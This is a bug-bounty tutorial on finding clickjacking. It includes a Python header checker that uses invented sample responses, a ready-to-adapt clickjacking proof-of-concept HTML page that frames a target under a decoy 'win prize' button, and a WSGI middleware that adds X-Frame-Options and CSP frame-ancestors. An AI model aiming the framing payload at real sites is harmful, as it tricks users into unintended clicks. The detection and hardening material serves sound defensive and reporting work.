How To Find Clickjacking Easily…


Josekutty Kunnelthazhe Binu

Hello guys, today I will show you how to find a clickjacking vulnerability easily.

Clickjacking is a type of security vulnerability where an attacker tricks a user into clicking something different from what they think they are clicking.

Imagine a hidden or invisible button placed on top of a regular button on a website. When you think you’re clicking to like a post or play a video, you’re actually clicking something harmful, such as granting permissions, sharing sensitive information, or making a purchase.

Note: Always make sure you test for clickjacking on sensitive endpoints such as the login page, registration page, payment page, password reset page, admin login, etc.

Go to the target website, open its sensitive endpoints (login, register, admin login, forgot password, etc.) and copy the URL of each one. Now go to clickjacker.io (I will add the link at the end) and paste your URLs one by one.

Sorry, I am at my day job at the moment, so I will show this on my mobile browser. The steps are the same whether you do this on mobile or on a computer.

If it's vulnerable, you will get a result like this on the clickjacker tool (screenshot in the original post):

If the target is not vulnerable, the output will look like this (screenshot in the original post):

Recommended fixes:

- Add X-Frame-Options header
- Add Content Security Policy (CSP) frame-ancestors
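The check the tool performs is a response-header check: is framing blocked by X-Frame-Options or by a CSP frame-ancestors directive? The following is an added example written for this post, not clickjacker.io's own code. It runs that check over constructed sample responses so it works offline; the function names, the example.test URLs and their headers are my own inventions. To check a live page you would pass it the headers from a real response (for instance `urllib.request.urlopen(url).headers.items()`).

```python
"""Header check for clickjacking exposure (added example, not the tool's code)."""
from typing import Mapping, Optional


def frame_ancestors_sources(csp: str) -> Optional[list]:
    """Return the source list of the CSP frame-ancestors directive, or None when
    the policy has no such directive. Directives are separated by ';' and the
    directive name is case-insensitive."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return tokens[1:]
    return None


def assess_framing(headers: Mapping[str, str]) -> dict:
    """Decide whether an arbitrary third-party origin can frame a page served
    with these response headers.

    Returns {"frameable": bool, "reason": str}. Header names are matched
    case-insensitively and, as in browsers, a CSP frame-ancestors directive
    takes precedence over X-Frame-Options when both are present.
    """
    lowered = {name.lower(): value.strip() for name, value in headers.items()}

    csp = lowered.get("content-security-policy")
    if csp is not None:
        sources = frame_ancestors_sources(csp)
        if sources is not None:
            norm = [s.lower() for s in sources]
            # An empty source list matches no origin, the same effect as 'none'.
            if not norm or norm == ["'none'"]:
                return {"frameable": False, "reason": "CSP frame-ancestors 'none'"}
            if "*" in norm:
                return {"frameable": True, "reason": "CSP frame-ancestors allows any origin (*)"}
            if norm == ["'self'"]:
                return {"frameable": False, "reason": "CSP frame-ancestors 'self' (same origin only)"}
            return {"frameable": False, "reason": "CSP frame-ancestors limited to: " + " ".join(sources)}

    xfo = lowered.get("x-frame-options")
    if xfo is not None:
        value = xfo.upper()
        if value in ("DENY", "SAMEORIGIN"):
            return {"frameable": False, "reason": "X-Frame-Options " + value}
        if value.startswith("ALLOW-FROM"):
            # Obsolete directive: current browsers ignore it, so it gives no protection.
            return {"frameable": True, "reason": "X-Frame-Options ALLOW-FROM is obsolete and ignored"}
        # Browsers ignore the whole header when the value is not one they recognise.
        return {"frameable": True, "reason": "X-Frame-Options value not recognised: " + xfo}

    return {"frameable": True, "reason": "no X-Frame-Options and no CSP frame-ancestors"}


# Constructed sample responses (made-up URLs and headers, not real targets).
SAMPLE_RESPONSES = {
    "https://example.test/login": {"Content-Type": "text/html"},
    "https://example.test/admin": {"X-Frame-Options": "DENY"},
    "https://example.test/pay": {"Content-Security-Policy": "default-src 'self'; frame-ancestors *"},
    "https://example.test/reset": {"Content-Security-Policy": "frame-ancestors 'self'",
                                   "X-Frame-Options": "ALLOW-FROM https://partner.test"},
}


def assess_all(responses: Mapping[str, Mapping[str, str]]) -> dict:
    """Run assess_framing over a {url: headers} mapping."""
    return {url: assess_framing(hdrs) for url, hdrs in responses.items()}


if __name__ == "__main__":
    for url, result in assess_all(SAMPLE_RESPONSES).items():
        status = "VULNERABLE" if result["frameable"] else "protected"
        print(f"{status:10} {url}: {result['reason']}")
```

Two details matter for triage: a page that sends only a CSP without frame-ancestors is still frameable (other directives say nothing about framing), and an X-Frame-Options header with a typo or with ALLOW-FROM is treated as absent by current browsers.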

Copy and paste the HTML code below:

```html
<!DOCTYPE html>
<html>
<head>
<title>Clickjacking PoC</title>
</head>
<body>
<!-- Decoy button the victim believes they are clicking; z-index:-1 puts it behind the frame -->
<input type="button" value="Click here to Win Prize" style="z-index:-1;left:1200px;position:relative;top:800px;"/>
<!-- Target page framed over the button; half transparent so the overlay is visible in the demo -->
<iframe src="http://target.com/" width="100%" height="100%" style="opacity: 0.5;"></iframe>
</body>
</html>
```

If the target is vulnerable, copy the above code, change target.com to the real target you are hunting, save the file as poc.html, attach it to your report and send it to the triage team.
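On the fixing side, the two mitigations named above are just response headers, so the simplest place to add them is once, in front of the whole application. The block below is an added example (not the post's code and not taken from any project): a stdlib-only WSGI middleware that sets X-Frame-Options and a CSP frame-ancestors directive on every response, merging into an existing Content-Security-Policy instead of overwriting it. The toy login app, the second app that already sends its own CSP, and the `run_request` helper are constructed for the demo.

```python
"""Anti-framing headers as WSGI middleware (added example, stdlib only)."""
from wsgiref.util import setup_testing_defaults


def anti_framing(app, policy="DENY"):
    """Wrap a WSGI app so every response forbids cross-origin framing.

    policy "DENY" blocks all framing (CSP frame-ancestors 'none');
    "SAMEORIGIN" lets only same-origin pages frame this one (CSP 'self').
    """
    if policy not in ("DENY", "SAMEORIGIN"):
        raise ValueError("policy must be DENY or SAMEORIGIN")
    ancestors = "'none'" if policy == "DENY" else "'self'"

    def wrapped(environ, start_response):
        def start_response_with_headers(status, headers, exc_info=None):
            out = []
            csp_seen = False
            for name, value in headers:
                key = name.lower()
                if key == "x-frame-options":
                    continue  # replaced below so the response carries exactly one value
                if key == "content-security-policy":
                    csp_seen = True
                    if "frame-ancestors" not in value.lower():
                        # Keep the app's own directives and append ours.
                        value = value.rstrip("; ") + "; frame-ancestors " + ancestors
                out.append((name, value))
            out.append(("X-Frame-Options", policy))
            if not csp_seen:
                out.append(("Content-Security-Policy", "frame-ancestors " + ancestors))
            return start_response(status, out, exc_info)

        return app(environ, start_response_with_headers)

    return wrapped


def login_app(environ, start_response):
    """Toy login page (constructed) that sets no anti-framing headers at all."""
    body = b"<form method=post><input name=user><input name=pw type=password></form>"
    start_response("200 OK", [("Content-Type", "text/html"),
                              ("Content-Length", str(len(body)))])
    return [body]


def csp_app(environ, start_response):
    """Toy app (constructed) that already sends a CSP without frame-ancestors
    and an obsolete ALLOW-FROM value; the middleware must repair both."""
    start_response("200 OK", [("Content-Security-Policy", "default-src 'self'"),
                              ("X-Frame-Options", "ALLOW-FROM https://partner.test")])
    return [b"ok"]


def run_request(app, path="/login"):
    """Call a WSGI app once with a synthetic request; return (status, headers dict, body)."""
    environ = {"PATH_INFO": path}
    setup_testing_defaults(environ)
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


if __name__ == "__main__":
    # Before: the bare login page can be framed by any origin.
    _, weak, _ = run_request(login_app)
    print("before:", weak.get("X-Frame-Options"), weak.get("Content-Security-Policy"))
    # After: the wrapped app sends both protections.
    _, hardened, _ = run_request(anti_framing(login_app))
    print("after: ", hardened["X-Frame-Options"], "|", hardened["Content-Security-Policy"])
```

Run it as a script to see the before/after headers. Sending both headers is deliberate: frame-ancestors is what current browsers honour, and X-Frame-Options covers older clients that predate CSP level 2.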

That's it… byeeeee

#Clickjacking #WebSecurity #Cybersecurity #BugBounty #EthicalHacking #PenTesting #Vulnerability #AppSec #WebAppSecurity #Infosec #Hacker #BugHunter #SecurityResearch #OWASP #Exploit
